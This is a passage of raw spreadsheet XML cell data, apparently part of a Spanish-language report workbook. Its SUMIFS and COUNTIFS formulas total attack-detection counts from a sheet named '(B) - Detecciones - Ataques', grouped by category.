        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>0</v>
      </c>
      <c r="DE77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>8</v>
      </c>
      <c r="DF77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>456</v>
      </c>
      <c r="DI77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>5505</v>
      </c>
      <c r="DJ77" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>14</v>
      </c>
      <c r="DK77" s="271"/>
      <c r="DO77" s="279"/>
      <c r="DP77" s="271"/>
      <c r="DQ77" s="271"/>
      <c r="DR77" s="271"/>
      <c r="DS77" s="271"/>
      <c r="DT77" s="271"/>
      <c r="DU77" s="271"/>
      <c r="DV77" s="271"/>
      <c r="DW77" s="271"/>
      <c r="DX77" s="271"/>
      <c r="DY77" s="271"/>
      <c r="DZ77" s="271"/>
      <c r="EA77" s="271"/>
      <c r="EB77" s="271"/>
      <c r="EC77" s="271"/>
      <c r="ED77" s="280"/>
      <c r="EG77" s="279"/>
      <c r="EH77" s="271"/>
      <c r="EI77" s="271"/>
      <c r="EJ77" s="271"/>
      <c r="EK77" s="271"/>
      <c r="EL77" s="271"/>
      <c r="EM77" s="271"/>
      <c r="EN77" s="271"/>
      <c r="EO77" s="271"/>
      <c r="EP77" s="478"/>
      <c r="EQ77" s="478"/>
      <c r="ER77" s="478"/>
      <c r="ES77" s="271"/>
      <c r="ET77" s="271"/>
      <c r="EU77" s="271"/>
      <c r="EV77" s="271"/>
      <c r="EW77" s="271"/>
      <c r="EX77" s="271"/>
      <c r="EY77" s="271"/>
      <c r="EZ77" s="271"/>
      <c r="FA77" s="280"/>
      <c r="FD77" s="480"/>
      <c r="FE77" s="480"/>
      <c r="FF77" s="480"/>
      <c r="FG77" s="480"/>
      <c r="FH77" s="480"/>
      <c r="FI77" s="480"/>
      <c r="FJ77" s="480"/>
      <c r="FK77" s="480"/>
      <c r="FL77" s="480"/>
      <c r="FM77" s="480"/>
      <c r="FN77" s="480"/>
      <c r="FO77" s="480"/>
      <c r="FP77" s="480"/>
      <c r="FQ77" s="480"/>
      <c r="FR77" s="480"/>
      <c r="FS77" s="480"/>
      <c r="FT77" s="480"/>
      <c r="FU77" s="480"/>
      <c r="FV77" s="480"/>
      <c r="FW77" s="480"/>
      <c r="FX77" s="480"/>
      <c r="FY77" s="379" t="s">
        <v>292</v>
      </c>
      <c r="FZ77" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY60)+SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY60 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY60)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY60 &amp; "*"))</f>
        <v>0.2</v>
      </c>
      <c r="GA77" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY60)+SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY60 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY60)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY60 &amp; "*"))</f>
        <v>0.2</v>
      </c>
      <c r="GB77" s="480"/>
      <c r="GC77" s="379" t="s">
        <v>292</v>
      </c>
      <c r="GD77" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY60)+SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY60 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY60)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY60 &amp; "*"))</f>
        <v>0.4</v>
      </c>
      <c r="GE77" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY60)+SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY60 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY60)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY60 &amp; "*"))</f>
        <v>0.4</v>
      </c>
      <c r="GF77" s="480"/>
      <c r="GG77" s="480"/>
      <c r="GH77" s="480"/>
      <c r="GI77" s="480"/>
      <c r="GJ77" s="480"/>
      <c r="GK77" s="480"/>
      <c r="GL77" s="480"/>
      <c r="GM77" s="480"/>
      <c r="GN77" s="480"/>
      <c r="GO77" s="480"/>
      <c r="GP77" s="480"/>
      <c r="GQ77" s="480"/>
      <c r="GR77" s="480"/>
      <c r="GS77" s="480"/>
      <c r="GT77" s="480"/>
      <c r="GU77" s="480"/>
      <c r="GV77" s="480"/>
      <c r="GW77" s="480"/>
      <c r="GX77" s="480"/>
      <c r="GY77" s="480"/>
      <c r="GZ77" s="480"/>
      <c r="HA77" s="480"/>
      <c r="HB77" s="480"/>
      <c r="HC77" s="480"/>
      <c r="HD77" s="480"/>
      <c r="HE77" s="480"/>
      <c r="HF77" s="480"/>
      <c r="HG77" s="480"/>
      <c r="HH77" s="480"/>
      <c r="HI77" s="480"/>
      <c r="HJ77" s="480"/>
      <c r="HK77" s="480"/>
      <c r="HL77" s="480"/>
      <c r="HM77" s="480"/>
      <c r="HN77" s="480"/>
      <c r="HO77" s="480"/>
      <c r="HP77" s="480"/>
    </row>
    <row r="78">
      <c r="F78" s="42" t="s">
        <v>2563</v>
      </c>
      <c r="J78" s="277"/>
      <c r="K78" s="500">
        <f t="shared" ref="K78:N78" si="64">K43/$L$31</f>
        <v>0.01550613762</v>
      </c>
      <c r="L78" s="501">
        <f t="shared" si="64"/>
        <v>0.2305930152</v>
      </c>
      <c r="M78" s="501">
        <f t="shared" si="64"/>
        <v>0.4376188624</v>
      </c>
      <c r="N78" s="502">
        <f t="shared" si="64"/>
        <v>1.829259595</v>
      </c>
      <c r="O78" s="278"/>
      <c r="Q78" s="271"/>
      <c r="R78" s="352" t="s">
        <v>2548</v>
      </c>
      <c r="S78" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>29492</v>
      </c>
      <c r="T78" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>28560</v>
      </c>
      <c r="U78" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>425</v>
      </c>
      <c r="V78" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>132</v>
      </c>
      <c r="W78" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>40</v>
      </c>
      <c r="X78" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>18831</v>
      </c>
      <c r="Y78" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>983</v>
      </c>
      <c r="Z78" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>604782</v>
      </c>
      <c r="AA78" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>233</v>
      </c>
      <c r="AB78" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>415</v>
      </c>
      <c r="AC78" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>163</v>
      </c>
      <c r="AD78" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>4224</v>
      </c>
      <c r="AE78" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>95</v>
      </c>
      <c r="AF78" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>7005</v>
      </c>
      <c r="AG78" s="271"/>
      <c r="AH78" s="352" t="s">
        <v>2548</v>
      </c>
      <c r="AI78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>29456</v>
      </c>
      <c r="AJ78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>5</v>
      </c>
      <c r="AK78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>30</v>
      </c>
      <c r="AL78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>1</v>
      </c>
      <c r="AM78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>28560</v>
      </c>
      <c r="AN78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>259</v>
      </c>
      <c r="AR78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>16</v>
      </c>
      <c r="AS78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>56</v>
      </c>
      <c r="AU78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>78</v>
      </c>
      <c r="AV78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>16</v>
      </c>
      <c r="AW78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>75</v>
      </c>
      <c r="AY78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>17</v>
      </c>
      <c r="BA78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>40</v>
      </c>
      <c r="BB78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>18673</v>
      </c>
      <c r="BD78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>150</v>
      </c>
      <c r="BF78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>4</v>
      </c>
      <c r="BG78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>4</v>
      </c>
      <c r="BH78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>796</v>
      </c>
      <c r="BI78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>4</v>
      </c>
      <c r="BJ78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>4</v>
      </c>
      <c r="BK78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>29</v>
      </c>
      <c r="BL78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>5</v>
      </c>
      <c r="BM78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>266160</v>
      </c>
      <c r="BN78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>338617</v>
      </c>
      <c r="BO78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>13</v>
      </c>
      <c r="BR78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>37</v>
      </c>
      <c r="BT78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>6</v>
      </c>
      <c r="BU78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>2</v>
      </c>
      <c r="BW78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>14</v>
      </c>
      <c r="BX78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>30</v>
      </c>
      <c r="BZ78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>25</v>
      </c>
      <c r="CA78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>8</v>
      </c>
      <c r="CC78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>4</v>
      </c>
      <c r="CD78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>4</v>
      </c>
      <c r="CE78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>12</v>
      </c>
      <c r="CG78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>1</v>
      </c>
      <c r="CH78" s="355">
